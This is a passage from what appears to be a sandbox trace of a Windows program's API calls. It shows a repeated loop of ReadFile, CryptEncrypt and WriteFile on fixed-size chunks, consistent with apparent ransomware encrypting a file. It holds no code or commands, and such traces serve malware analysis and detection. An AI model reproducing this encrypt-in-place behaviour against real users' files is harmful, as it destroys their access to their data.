[0273.811] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.811] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.811] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.811] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.811] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.811] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.811] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.812] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.812] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.812] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.812] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.812] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.813] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.813] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.813] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.813] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.813] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.814] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.814] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.814] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.814] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.814] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.815] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.815] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.815] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.816] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.816] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.816] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.816] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.816] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.817] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.817] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.817] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.817] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.817] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.818] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.818] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.818] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.818] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.818] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.818] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.819] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.819] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.819] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.819] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.819] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.820] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.820] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 